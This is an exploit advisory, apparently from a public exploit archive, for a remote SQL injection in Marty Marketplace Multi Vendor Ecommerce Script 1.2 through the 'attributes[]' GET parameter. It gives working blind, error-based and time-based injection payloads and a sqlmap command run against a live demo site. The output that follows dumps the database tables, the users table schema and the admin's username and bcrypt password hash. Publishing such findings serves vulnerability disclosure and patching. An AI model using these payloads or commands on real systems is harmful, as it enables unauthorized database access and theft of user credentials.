Headline
Marty Marketplace Multi Vendor Ecommerce Script 1.2 SQL Injection
Marty Marketplace Multi Vendor Ecommerce Script version 1.2 suffers from a remote SQL injection vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Exploits ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr │ │ :│ Website : sangvish.com │ │ ││ Vendor : SangVish Technologies │ │ ││ Software : Marty Marketplace Multi Vendor │ │ Open Source Marketplace PHP script for ││ Ecommerce Script v1.2 │ │ eCommerce marketplace platforms ││ Vuln Type: Remote SQL Injection │ │ in the market ││ Method : GET │ │ ││ Impact : Database Access │ │ ││ │ │ ││────────────────────────────────────────────┘ └─────────────────────────────────────────││ B4nks-NET irc.b4nks.tk #unix ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ Typically used for remotely exploitable vulnerabilities that can lead to ││ system compromise. ││ │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear CryptoJob (Twitter) twitter.com/CryptozJob Special Greetz to The Lebanese National Basketball Team for the results of the FIBA Asia Cup┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2022 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'attributes[]' is vulnerable---Parameter: attributes[] (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: attributes[]=(SELECT (CASE WHEN (6997=6997) THEN 6 ELSE (SELECT 7905 UNION SELECT 6396) END)) Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: attributes[]=6 AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(8162=8162,1))),0x716b6a7071),8162) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: attributes[]=6 AND (SELECT 8488 FROM (SELECT(SLEEP(5)))dSkn)---Demo: https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6[+] Starting the Attacksqlmap.py -u "https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6" --current-db --batch[+] fetching current database[INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL >= 5.6[INFO] retrieved: 'garudan_buy2marty'current database: 'garudan_buy2marty'[+] fetching tables for database: 'garudan_buy2marty'Database: garudan_buy2marty[105 tables]+----------------------------------------+| activations || ads || ads_translations || audit_histories || categories || categories_translations || contact_replies || contacts || dashboard_widget_settings || dashboard_widgets || ec_brands || ec_brands_translations || ec_cart || ec_currencies || ec_customer_addresses || ec_customer_password_resets || ec_customers || ec_discount_customers || ec_discount_product_collections || ec_discount_products || ec_discounts || ec_flash_sale_products || ec_flash_sales || ec_flash_sales_translations || ec_grouped_products || ec_order_addresses || ec_order_histories || ec_order_product || ec_orders || ec_product_attribute_sets || ec_product_attribute_sets_translations || ec_product_attributes || ec_product_attributes_translations || ec_product_categories || ec_product_categories_translations || ec_product_category_product || ec_product_collection_products || ec_product_collections || ec_product_collections_translations || ec_product_cross_sale_relations || ec_product_label_products || ec_product_labels || ec_product_labels_translations || ec_product_related_relations || ec_product_tag_product || ec_product_tags || ec_product_tags_translations || ec_product_up_sale_relations || ec_product_variation_items || ec_product_variations || ec_product_with_attribute || ec_product_with_attribute_set || ec_products || ec_products_translations || ec_reviews || ec_shipment_histories || ec_shipments || ec_shipping || ec_shipping_rule_items || ec_shipping_rules || ec_store_locators || ec_taxes || ec_wish_lists || failed_jobs || faq_categories || faq_categories_translations || faqs || faqs_translations || jobs || language_meta || languages || media_files || media_folders || media_settings || menu_locations || menu_nodes || menus || meta_boxes || migrations || mp_customer_revenues || mp_customer_withdrawals || mp_stores || mp_vendor_info || newsletters || pages || pages_translations || password_resets || payments || post_categories || post_tags || posts || posts_translations || revisions || role_users || roles || settings || simple_slider_items || simple_sliders || slugs || tags || tags_translations || translations || user_meta || users || widgets |+----------------------------------------+[+] fetching columns for table 'users' in database 'garudan_buy2marty'Database: garudan_buy2martyTable: users[15 columns]+-------------------+---------------------+| Column | Type |+-------------------+---------------------+| avatar_id | int(10) unsigned || created_at | timestamp || email | varchar(191) || email_verified_at | timestamp || first_name | varchar(191) || id | bigint(20) unsigned || last_login | timestamp || last_name | varchar(191) || manage_supers | tinyint(1) || password | varchar(191) || permissions | text || remember_token | varchar(100) || super_user | tinyint(1) || updated_at | timestamp || username | varchar(60) |+-------------------+---------------------+[+] fetching entries of column(s) 'id,password,permissions,super_user,username' for table 'users' in database 'garudan_buy2marty'Database: garudan_buy2martyTable: users[1 entry]+----+----------+--------------------------------------------------------------+------------+-------------+| id | username | password | super_user | permissions |+----+----------+--------------------------------------------------------------+------------+-------------+| 1 | admin | $2y$10$XHYYo3gcYa5sUh62hgASseoSJfQae/w8KOWAW/G6qlHRri6XPRW/2 | 1 | NULL |+----+----------+--------------------------------------------------------------+------------+-------------+ Possible algorithms: bcrypt $2*$, Blowfish (Unix)[-] Done